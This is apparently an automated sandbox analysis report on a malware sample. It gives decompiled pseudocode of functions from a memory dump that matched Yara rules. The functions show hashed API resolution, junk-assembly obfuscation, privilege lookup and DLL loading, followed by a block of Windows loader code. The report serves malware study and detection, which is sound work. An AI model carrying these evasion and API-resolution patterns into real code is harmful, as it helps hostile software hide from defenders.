                                                        • API String ID: 1279760036-1400015478
                                                        • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                        • Instruction ID: b63900df46c74d48569035b2bcc9be016157083d4ef88d1b541c797289a4eec1
                                                        • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                        • Instruction Fuzzy Hash: 46E012B1200208ABDB14EF99CC41EA777ACEF88664F158559BA085B242C630F9118AB0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 75%
                                                        			E0040AC6C(void* __ebx, void* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                        				char _v1;
                                                        				char* _v8;
                                                        				struct _EXCEPTION_RECORD _v12;
                                                        				struct _OBJDIR_INFORMATION _v16;
                                                        				void* _v117;
                                                        				char _v536;
                                                        				struct _OBJDIR_INFORMATION _t31;
                                                        				struct _OBJDIR_INFORMATION _t33;
                                                        				struct _OBJDIR_INFORMATION _t34;
                                                        				void* _t40;
                                                        				intOrPtr* _t41;
                                                        				intOrPtr* _t42;
                                                        				intOrPtr* _t43;
                                                        				intOrPtr* _t44;
                                                        				void* _t52;
                                                        				void* _t53;
                                                        				void* _t54;
                                                        				void* _t55;
                                                        				intOrPtr* _t66;
                                                        				intOrPtr _t69;
                                                        				char* _t71;
                                                        				void* _t77;
                                                        				void* _t79;
                                                        				void* _t80;
                                                        
                                                        				_t71 =  &_v1;
                                                        				if(_t71 < 0) {
                                                        					0xaec2e248();
                                                        					asm("loop 0x54");
                                                        					_push(_t71);
                                                        					_v8 =  &_v536;
                                                        					_t31 = E0041CC50( &_v12, 0x104, _a8);
                                                        					_t79 = _t77 - 0x214 + 0xc;
                                                        					__eflags = _t31;
                                                        					if(__eflags != 0) {
                                                        						_t33 = E0041D070(__eflags, _v8);
                                                        						_t80 = _t79 + 4;
                                                        						__eflags = _t33;
                                                        						if(_t33 != 0) {
                                                        							E0041D2F0( &_v12, 0);
                                                        							_t80 = _t80 + 8;
                                                        						}
                                                        						_t34 = E0041B4A0(_v8);
                                                        						_v16 = _t34;
                                                        						__eflags = _t34;
                                                        						if(_t34 == 0) {
                                                        							LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                                        							_t34 = _v16;
                                                        						}
                                                        						return _t34;
                                                        					} else {
                                                        						return _t31;
                                                        					}
                                                        				} else {
                                                        					_push(_t71);
                                                        					_t69 = _a8;
                                                        					_t66 = _a4;
                                                        					if(_t69 > 1) {
                                                        						_t5 = _t69 - 2; // 0xe8ea
                                                        						_t43 = _t66 + _t5;
                                                        						_t54 = _t69 - 1;
                                                        						do {
                                                        							 *_t43 =  *_t43 +  *((intOrPtr*)(_t43 + 1));
                                                        							_t43 = _t43 - 1;
                                                        							_t54 = _t54 - 1;
                                                        						} while (_t54 != 0);
                                                        						if(_t69 > 1) {
                                                        							_t44 = _t66;
                                                        							_t55 = _t69 - 1;
                                                        							do {
                                                        								 *_t44 =  *_t44 +  *((intOrPtr*)(_t44 + 1));
                                                        								_t44 = _t44 + 1;
                                                        								_t55 = _t55 - 1;
                                                        							} while (_t55 != 0);
                                                        						}
                                                        					}
                                                        					_t40 = E0040AA10(_t66, _t69, _a12);
                                                        					if(_t69 > 1) {
                                                        						_t12 = _t69 - 2; // 0xe8ea
                                                        						_t41 = _t66 + _t12;
                                                        						_t52 = _t69 - 1;
                                                        						do {
                                                        							 *_t41 =  *_t41 +  *((intOrPtr*)(_t41 + 1));
                                                        							_t41 = _t41 - 1;
                                                        							_t52 = _t52 - 1;
                                                        						} while (_t52 != 0);
                                                        						if(_t69 > 1) {
                                                        							_t42 = _t66;
                                                        							_t53 = _t69 - 1;
                                                        							do {
                                                        								 *_t42 =  *_t42 +  *((intOrPtr*)(_t42 + 1));
                                                        								_t42 = _t42 + 1;
                                                        								_t53 = _t53 - 1;
                                                        							} while (_t53 != 0);
                                                        						}
                                                        					}
                                                        					return _t40;
                                                        				}
                                                        			}




























                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 74f31a5475c3ac62470ac21ed5d7384022201c69dfbc097c16fee53b3b421591
                                                        • Instruction ID: 8463cfb5f2cfbdb0b6ecb55caaab3a75965649350571dd15a7b479e1367fd4f3
                                                        • Opcode Fuzzy Hash: 74f31a5475c3ac62470ac21ed5d7384022201c69dfbc097c16fee53b3b421591
                                                        • Instruction Fuzzy Hash: 1531993180824A5FEB10DB54D884EFEB765DF51308F0901ABEC48AB3C2E5369D18C792
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 53%
                                                        			E00408308(signed int __eax, void* __ecx, void* __edi, intOrPtr* __esi, char _a1, long _a8) {
                                                        				intOrPtr _v4;
                                                        				char _v75;
                                                        				char _v76;
                                                        				void* _t16;
                                                        				int _t17;
                                                        				signed char _t26;
                                                        				long _t27;
                                                        				int _t32;
                                                        				char* _t34;
                                                        				void* _t35;
                                                        				void* _t37;
                                                        				void* _t42;
                                                        
                                                        				_t34 =  &_a1;
                                                        				_t42 = __ecx -  *__esi;
                                                        				_push(ss);
                                                        				_t26 = __eax | 0x00000047;
                                                        				_push(_t34);
                                                        				_push(_t34);
                                                        				_t35 = _t37;
                                                        				_push(__esi);
                                                        				_v76 = 0;
                                                        				E0041BE60( &_v75, 0, 0x3f);
                                                        				E0041CA00( &_v76, 3);
                                                        				_t16 = E0040ACF0(_t42, _v4 + 0x1c,  &_v76); // executed
                                                        				_t17 = E00414E50(_v4 + 0x1c, _t16, 0, 0, 0xc4e7b6d6);
                                                        				_t32 = _t17;
                                                        				if(_t32 != 0) {
                                                        					_push(_t26);
                                                        					_t27 = _a8;
                                                        					_t17 = PostThreadMessageW(_t27, 0x111, 0, 0); // executed
                                                        					_t44 = _t17;
                                                        					if(_t17 == 0) {
                                                        						_t17 =  *_t32(_t27, 0x8003, _t35 + (E0040A480(_t44, 1, 8) & 0x000000ff) - 0x40, _t17);
                                                        					}
                                                        				}
                                                        				return _t17;
                                                        			}
















                                                        APIs
                                                        • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                        Yara matches
                                                        Similarity
                                                        • API ID: MessagePostThread
                                                        • String ID:
                                                        • API String ID: 1836367815-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 82%
                                                        			E00408310(void* __eflags, intOrPtr _a4, long _a8) {
                                                        				char _v67;
                                                        				char _v68;
                                                        				void* _t12;
                                                        				intOrPtr* _t13;
                                                        				int _t14;
                                                        				long _t21;
                                                        				intOrPtr* _t25;
                                                        				void* _t26;
                                                        				void* _t30;
                                                        
                                                        				_t30 = __eflags;
                                                        				_v68 = 0;
                                                        				E0041BE60( &_v67, 0, 0x3f);
                                                        				E0041CA00( &_v68, 3);
                                                        				_t12 = E0040ACF0(_t30, _a4 + 0x1c,  &_v68); // executed
                                                        				_t13 = E00414E50(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                                                        				_t25 = _t13;
                                                        				if(_t25 != 0) {
                                                        					_t21 = _a8;
                                                        					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                                                        					_t32 = _t14;
                                                        					if(_t14 == 0) {
                                                        						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040A480(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
                                                        					}
                                                        					return _t14;
                                                        				}
                                                        				return _t13;
                                                        			}













                                                        APIs
                                                        • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                        Yara matches
                                                        Similarity
                                                        • API ID: MessagePostThread
                                                        • String ID:
                                                        • API String ID: 1836367815-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 50%
                                                        			E0041A7C1(char __eax, void* __edi) {
                                                        				int _t11;
                                                        				void* _t20;
                                                        				void* _t21;
                                                        
                                                        				asm("std");
                                                        				asm("sbb [edx-0x52], edi");
                                                        				asm("std");
                                                        				_t21 = _t20 + __edi;
                                                        				 *0x8b5517d2 = __eax;
                                                        				_push(_t21);
                                                        				_t8 =  *0x2CEB848C;
                                                        				E0041AF60(__edi,  *0x2CEB848C,  *0x2CEB848C + 0xc8c,  *((intOrPtr*)(_t8 + 0xa18)), 0, 0x46);
                                                        				_t11 = LookupPrivilegeValueW( *0x2CEB8490,  *0x2CEB8494,  *0x2CEB8498); // executed
                                                        				return _t11;
                                                        			}







                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 53%
                                                        			E0041A663(void* __ecx, void* __edi, intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                                        				char _t11;
                                                        
                                                        				asm("arpl [eax-0x46], dx");
                                                        				asm("ficom dword [eax-0x32005d64]");
                                                        				asm("sbb eax, 0xec8b55b1");
                                                        				_t8 = _a4;
                                                        				_t4 = _t8 + 0xc74; // 0xc74
                                                        				E0041AF60(__ecx, _a4, _t4,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                                        				_t11 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                        				return _t11;
                                                        			}





                                                        APIs
                                                        • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FreeHeap
                                                        • String ID:
                                                        • API String ID: 3298025750-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E0041A670(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                                        				char _t10;
                                                        				void* _t15;
                                                        
                                                        				_t3 = _a4 + 0xc74; // 0xc74
                                                        				E0041AF60(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                                        				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                        				return _t10;
                                                        			}






                                                        APIs
                                                        • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FreeHeap
                                                        • String ID:
                                                        • API String ID: 3298025750-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E0041A7D0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                        				int _t10;
                                                        				void* _t15;
                                                        
                                                        				E0041AF60(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                                                        				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                        				return _t10;
                                                        			}






                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 30%
                                                        			E0041A6A2() {
                                                        				void* _t14;
                                                        				void* _t18;
                                                        				void* _t19;
                                                        
                                                        				_pop(_t15);
                                                        				asm("sbb [esi-0x44002df2], ah");
                                                        				asm("stosd");
                                                        				asm("popfd");
                                                        				asm("repe and ah, bh");
                                                        				_t18 = _t19;
                                                        				_t6 =  *((intOrPtr*)(_t18 + 8));
                                                        				E0041AF60(_t14,  *((intOrPtr*)(_t18 + 8)),  *((intOrPtr*)(_t18 + 8)) + 0xc7c,  *((intOrPtr*)(_t6 + 0xa14)), 0, 0x36);
                                                        				ExitProcess( *(_t18 + 0xc));
                                                        			}







                                                        APIs
                                                        • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 0041A6D8
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExitProcess
                                                        • String ID:
                                                        • API String ID: 621844428-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E0041A6B0(intOrPtr _a4, int _a8) {
                                                        				void* _t10;
                                                        
                                                        				_t5 = _a4;
                                                        				E0041AF60(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                                                        				ExitProcess(_a8);
                                                        			}





                                                        APIs
                                                        • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 0041A6D8
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExitProcess
                                                        • String ID:
                                                        • API String ID: 621844428-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        C-Code - Quality: 55%
                                                        			E00B6C5F0(intOrPtr _a4, char _a8, signed short _a12, intOrPtr _a16, intOrPtr _a20) {
                                                        				signed int _v8;
                                                        				char _v544;
                                                        				char _v1064;
                                                        				char _v1068;
                                                        				char _v1069;
                                                        				signed short* _v1076;
                                                        				signed short _v1080;
                                                        				intOrPtr _v1084;
                                                        				signed short _v1086;
                                                        				char _v1088;
                                                        				char _v1092;
                                                        				signed short _v1096;
                                                        				char _v1100;
                                                        				char* _v1104;
                                                        				short _v1106;
                                                        				char _v1108;
                                                        				char _v1111;
                                                        				char _v1112;
                                                        				signed short _v1116;
                                                        				char _v1120;
                                                        				intOrPtr _v1124;
                                                        				short _v1126;
                                                        				char _v1128;
                                                        				intOrPtr _v1132;
                                                        				intOrPtr _v1136;
                                                        				intOrPtr _v1140;
                                                        				char _v1144;
                                                        				intOrPtr _v1148;
                                                        				short _v1150;
                                                        				char _v1152;
                                                        				char* _v1156;
                                                        				short _v1158;
                                                        				char _v1160;
                                                        				intOrPtr _v1164;
                                                        				intOrPtr _v1172;
                                                        				intOrPtr _v1176;
                                                        				char _v1180;
                                                        				intOrPtr _v1184;
                                                        				intOrPtr _v1188;
                                                        				intOrPtr _v1192;
                                                        				char* _v1196;
                                                        				intOrPtr _v1200;
                                                        				char _v1204;
                                                        				char _v1212;
                                                        				void* __ebx;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				signed int _t173;
                                                        				intOrPtr _t175;
                                                        				void* _t191;
                                                        				void* _t193;
                                                        				intOrPtr _t200;
                                                        				char _t215;
                                                        				void* _t226;
                                                        				signed short _t250;
                                                        				void* _t284;
                                                        				signed short _t286;
                                                        				unsigned int _t292;
                                                        				short _t294;
                                                        				signed int _t295;
                                                        				void* _t296;
                                                        
                                                        				_t173 =  *0xc22088; // 0x76fbb2c1
                                                        				_v8 = _t173 ^ _t295;
                                                        				_t175 = _a4;
                                                        				_t272 = _a8;
                                                        				_v1132 = _a16;
                                                        				_v1140 = _a20;
                                                        				_v1160 = 0;
                                                        				_v1158 = 0x208;
                                                        				_v1156 =  &_v1064;
                                                        				_t282 = 0;
                                                        				_t288 = 0;
                                                        				_t286 = _a12;
                                                        				_v1164 = _t175;
                                                        				_v1069 = 0;
                                                        				_v1068 = 0;
                                                        				_v1136 = 0;
                                                        				_v1088 = 0;
                                                        				_v1086 = 0;
                                                        				_v1084 = 0;
                                                        				_v1128 = 0;
                                                        				_v1126 = 0;
                                                        				_v1124 = 0;
                                                        				_v1144 = 0;
                                                        				if(_t175 == 0) {
                                                        					_t282 = 0;
                                                        					L66:
                                                        					_push(_t282);
                                                        					_push(_t286);
                                                        					_push(_t272);
                                                        					_push(_t175);
                                                        					E00B93F92(0x33, 0, "SXS: %s() bad parameters\nSXS:   Map                : %p\nSXS:   Data               : %p\nSXS:   AssemblyRosterIndex: 0x%lx\nSXS:   Map->AssemblyCount : 0x%lx\n", "RtlpResolveAssemblyStorageMapEntry");
                                                        					_t288 = 0xc000000d;
                                                        					L18:
                                                        					if(_v1069 == 0) {
                                                        						L20:
                                                        						if(_v1084 != 0) {
                                                        							 *0xb4e6f0(_v1084);
                                                        						}
                                                        						if(_v1068 != 0) {
                                                        							E00B3F9F0(_v1068);
                                                        						}
                                                        						if(_v1136 != 0) {
                                                        							E00B4E025(_t272,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v1136);
                                                        						}
                                                        						L23:
                                                        						return E00B4E1B4(_t288, 0, _v8 ^ _t295, _t282, _t286, _t288);
                                                        					}
                                                        					L19:
                                                        					_v1120 = _v1144;
                                                        					_v1132(4,  &_v1120, _v1140);
                                                        					goto L20;
                                                        				}
                                                        				if(_t272 == 0 || _t286 < 1 || _t286 >  *((intOrPtr*)(_t175 + 4))) {
                                                        					_t282 =  *((intOrPtr*)(_t175 + 4));
                                                        					goto L66;
                                                        				} else {
                                                        					if( *((intOrPtr*)( *((intOrPtr*)(_t175 + 8)) + _t286 * 4)) != 0) {
                                                        						goto L23;
                                                        					}
                                                        					_t284 =  *((intOrPtr*)(_t272 + 0x18)) + _t272;
                                                        					_t191 =  *((intOrPtr*)( *((intOrPtr*)(_t284 + 0xc)) + _t286 * 0x18 + _t272 + 0x10)) + _t272;
                                                        					_t291 =  *((intOrPtr*)(_t191 + 0x50));
                                                        					_t282 =  *((intOrPtr*)(_t284 + 0x10)) + _t272;
                                                        					if( *((intOrPtr*)(_t191 + 0x50)) > 0xfffe) {
                                                        						_push(_t272);
                                                        						E00B93F92(0x33, 0, "SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p\n", _t291);
                                                        						L39:
                                                        						_t288 = 0xc0000106;
                                                        						goto L20;
                                                        					}
                                                        					if(( *(_t191 + 4) & 0x00000010) != 0) {
                                                        						L27:
                                                        						_v1076 =  &_v1160;
                                                        						_t286 =  *((intOrPtr*)(_t191 + 0x18)) + _t282;
                                                        						_v1080 = _t286;
                                                        						if(_t286 == 0) {
                                                        							_t288 = 0xc00000e5;
                                                        							goto L23;
                                                        						}
                                                        						_t193 = E00B58342(_t286, 0x5c);
                                                        						_pop(_t272);
                                                        						if(_t193 == 0) {
                                                        							_t288 = 0xc00000e5;
                                                        							goto L20;
                                                        						}
                                                        						_t286 = (_t193 - _t286 >> 0x00000001) + (_t193 - _t286 >> 0x00000001) + 0x00000004 & 0x0000ffff;
                                                        						if(_t286 > 0x208) {
                                                        							if(_t286 > 0xfffe) {
                                                        								goto L39;
                                                        							}
                                                        							_v1086 = _t286;
                                                        							_t200 =  *0xb4e6f4(_t286 & 0x0000ffff);
                                                        							_v1084 = _t200;
                                                        							if(_t200 != 0) {
                                                        								_v1076 =  &_v1088;
                                                        								goto L30;
                                                        							}
                                                        							_t288 = 0xc0000017;
                                                        							goto L20;
                                                        						}
                                                        						L30:
                                                        						_t292 = _t286 & 0x0000ffff;
                                                        						E00B42340(_v1076[2], _v1080, _t292 - 2);
                                                        						_t272 = 0;
                                                        						 *((short*)(_v1076[2] + (_t292 >> 1) * 2 - 2)) = 0;
                                                        						_t296 = _t296 + 0xc;
                                                        						 *_v1076 = _t286;
                                                        						L15:
                                                        						if(_v1068 == 0) {
                                                        							if(E00B5DA3A(_v1076[2],  &_v1128, 0,  &_v1180) == 0) {
                                                        								E00B93F92(0x33, 0, "SXS: Attempt to translate DOS path name \"%S\" to NT format failed\n", _v1076[2]);
                                                        								_t288 = 0xc000003a;
                                                        								goto L18;
                                                        							}
                                                        							_v1136 = _v1124;
                                                        							_t215 = _v1180;
                                                        							if(_t215 != 0) {
                                                        								_v1128 = _t215;
                                                        								_v1124 = _v1176;
                                                        							} else {
                                                        								_v1172 = 0;
                                                        							}
                                                        							_v1200 = _v1172;
                                                        							_push(0x21);
                                                        							_v1196 =  &_v1128;
                                                        							_push(3);
                                                        							_push( &_v1212);
                                                        							_push( &_v1204);
                                                        							_push(0x100020);
                                                        							_v1204 = 0x18;
                                                        							_v1192 = 0x40;
                                                        							_v1188 = 0;
                                                        							_v1184 = 0;
                                                        							_t288 = E00B3FD74( &_v1068);
                                                        							E00B5A331( &_v1180, _t272,  &_v1180);
                                                        							if(_t288 >= 0) {
                                                        								goto L16;
                                                        							} else {
                                                        								_push(_t288);
                                                        								E00B93F92(0x33, 0, "SXS: Unable to open assembly directory under storage root \"%S\"; Status = 0x%08lx\n", _v1076[2]);
                                                        								goto L18;
                                                        							}
                                                        						}
                                                        						L16:
                                                        						_t226 = E00B6CC91(_v1164, _a12, _v1076,  &_v1068);
                                                        						_t288 = _t226;
                                                        						if(_t226 < 0) {
                                                        							E00B93F92(0x33, 0, "SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx\n", _t288);
                                                        						} else {
                                                        							_t288 = 0;
                                                        						}
                                                        						goto L18;
                                                        					}
                                                        					_v1076 = 0;
                                                        					_t294 =  *((intOrPtr*)(_t191 + 0x50));
                                                        					_v1152 = _t294;
                                                        					_v1150 = _t294;
                                                        					_v1148 =  *((intOrPtr*)(_t191 + 0x54)) + _t282;
                                                        					_v1108 = 0;
                                                        					_v1106 = 0x216;
                                                        					_v1104 =  &_v544;
                                                        					_v1120 = _t272;
                                                        					_v1116 = _t286;
                                                        					_v1112 = 0;
                                                        					_v1100 = 0;
                                                        					_v1092 = 0;
                                                        					_v1096 = 0;
                                                        					_v1132(1,  &_v1120, _v1140);
                                                        					if(_v1092 != 0) {
                                                        						_t288 = 0xc0000120;
                                                        						goto L20;
                                                        					}
                                                        					if(_v1100 != 0) {
                                                        						_t288 = E00B6D088(0,  &_v1108,  &_v1152,  &_v1160,  &_v1088,  &_v1076,  &_v1068);
                                                        						if(_t288 >= 0) {
                                                        							_t288 = E00B6CC91(_v1164, _t286,  &_v1108,  &_v1068);
                                                        							if(_t288 >= 0) {
                                                        								_t288 = 0;
                                                        								goto L20;
                                                        							}
                                                        							_push(_t288);
                                                        							_push(_t286);
                                                        							_push("SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx\n");
                                                        							L50:
                                                        							_push(0);
                                                        							_push(0x33);
                                                        							E00B93F92();
                                                        							goto L20;
                                                        						}
                                                        						_push(_t288);
                                                        						_push( &_v1108);
                                                        						_push("SXS: Attempt to probe known root of assembly storage (\"%wZ\") failed; Status = 0x%08lx\n");
                                                        						goto L50;
                                                        					}
                                                        					_v1144 = _v1112;
                                                        					_t250 = _v1096;
                                                        					_t286 = 0;
                                                        					_v1080 = _t250;
                                                        					_v1069 = 1;
                                                        					if(_t250 <= 0) {
                                                        						L14:
                                                        						if(_t286 == _v1080) {
                                                        							L59:
                                                        							_push(_t286);
                                                        							E00B93F92(0x33, 0, "SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries\n",  &_v1152);
                                                        							_t288 = 0xc0150004;
                                                        							goto L19;
                                                        						}
                                                        						goto L15;
                                                        					} else {
                                                        						goto L10;
                                                        					}
                                                        					while(1) {
                                                        						L10:
                                                        						_v1120 = _v1144;
                                                        						_v1108 = 0;
                                                        						_v1106 = 0x216;
                                                        						_v1104 =  &_v544;
                                                        						_v1116 = _t286;
                                                        						_v1112 = 0;
                                                        						_v1111 = 0;
                                                        						_v1132(2,  &_v1120, _v1140);
                                                        						if(_v1112 != 0) {
                                                        							break;
                                                        						}
                                                        						if(_v1111 != 0) {
                                                        							if(_v1108 == 0) {
                                                        								goto L59;
                                                        							}
                                                        							_t159 = _t286 + 1; // 0x1
                                                        							_v1080 = _t159;
                                                        						}
                                                        						if(_v1108 != 0) {
                                                        							if(_v1068 != 0) {
                                                        								E00B3F9F0(_v1068);
                                                        								_v1068 = 0;
                                                        							}
                                                        							_t288 = E00B6D088(0,  &_v1108,  &_v1152,  &_v1160,  &_v1088,  &_v1076,  &_v1068);
                                                        							if(_t288 >= 0) {
                                                        								goto L14;
                                                        							} else {
                                                        								if(_t288 == 0xc0150004) {
                                                        									goto L13;
                                                        								} else {
                                                        									_push(_t288);
                                                        									_push( &_v1152);
                                                        									E00B93F92(0x33, 0, "SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx\n",  &_v1108);
                                                        									goto L19;
                                                        								}
                                                        								goto L27;
                                                        							}
                                                        						}
                                                        						L13:
                                                        						_t286 = _t286 + 1;
                                                        						if(_t286 < _v1080) {
                                                        							continue;
                                                        						}
                                                        						goto L14;
                                                        					}
                                                        					_t288 = 0xc0000120;
                                                        					goto L19;
                                                        				}
                                                        			}
                                                        0x00000000
                                                        0x00b6c86c
                                                        0x00b6c6f7
                                                        0x00b6c6fd
                                                        0x00b6c701
                                                        0x00b6c708
                                                        0x00b6c714
                                                        0x00b6c71c
                                                        0x00b6c728
                                                        0x00b6c735
                                                        0x00b6c744
                                                        0x00b6c74a
                                                        0x00b6c750
                                                        0x00b6c756
                                                        0x00b6c75c
                                                        0x00b6c762
                                                        0x00b6c768
                                                        0x00b6c774
                                                        0x00ba5417
                                                        0x00000000
                                                        0x00ba5417
                                                        0x00b6c780
                                                        0x00ba5451
                                                        0x00ba5455
                                                        0x00ba548e
                                                        0x00ba5492
                                                        0x00ba549d
                                                        0x00000000
                                                        0x00ba549d
                                                        0x00ba5494
                                                        0x00ba5495
                                                        0x00ba5496
                                                        0x00ba5464
                                                        0x00ba5464
                                                        0x00ba5465
                                                        0x00ba5467
                                                        0x00000000
                                                        0x00ba546c
                                                        0x00ba5457
                                                        0x00ba545e
                                                        0x00ba545f
                                                        0x00000000
                                                        0x00ba545f
                                                        0x00b6c78c
                                                        0x00b6c792
                                                        0x00b6c798
                                                        0x00b6c79a
                                                        0x00b6c7a0
                                                        0x00b6c7a9
                                                        0x00b6c835
                                                        0x00b6c83b
                                                        0x00ba54df
                                                        0x00ba54df
                                                        0x00ba54ef
                                                        0x00ba54f7
                                                        0x00000000
                                                        0x00ba54f7
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b6c7af
                                                        0x00b6c7af
                                                        0x00b6c7bb
                                                        0x00b6c7c3
                                                        0x00b6c7cf
                                                        0x00b6c7dc
                                                        0x00b6c7eb
                                                        0x00b6c7f1
                                                        0x00b6c7f7
                                                        0x00b6c7fd
                                                        0x00b6c809
                                                        0x00000000
                                                        0x00000000
                                                        0x00b6c815
                                                        0x00ba54ab
                                                        0x00000000
                                                        0x00000000
                                                        0x00ba54ad
                                                        0x00ba54b0
                                                        0x00ba54b0
                                                        0x00b6c822
                                                        0x00b6d03e
                                                        0x00ba54c1
                                                        0x00ba54c6
                                                        0x00ba54c6
                                                        0x00b6d074
                                                        0x00b6d078
                                                        0x00000000
                                                        0x00b6d07e
                                                        0x00ba54d7
                                                        0x00000000
                                                        0x00ba54dd
                                                        0x00ba550b
                                                        0x00ba5512
                                                        0x00ba5522
                                                        0x00000000
                                                        0x00ba5527
                                                        0x00000000
                                                        0x00ba54d7
                                                        0x00b6d078
                                                        0x00b6c828
                                                        0x00b6c828
                                                        0x00b6c82f
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b6c82f
                                                        0x00ba5501
                                                        0x00000000
                                                        0x00ba5501

                                                        Strings
                                                        • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 00BA5566
                                                        • RtlpResolveAssemblyStorageMapEntry, xrefs: 00BA5581
                                                        • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 00BA5386
                                                        • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 00BA54E7
                                                        • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 00BA5586
                                                        • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 00BA5550
                                                        • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 00BA551A
                                                        • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 00BA545F
                                                        • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 00BA5496
                                                        • @, xrefs: 00B822A5
                                                        • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 00BA53FD
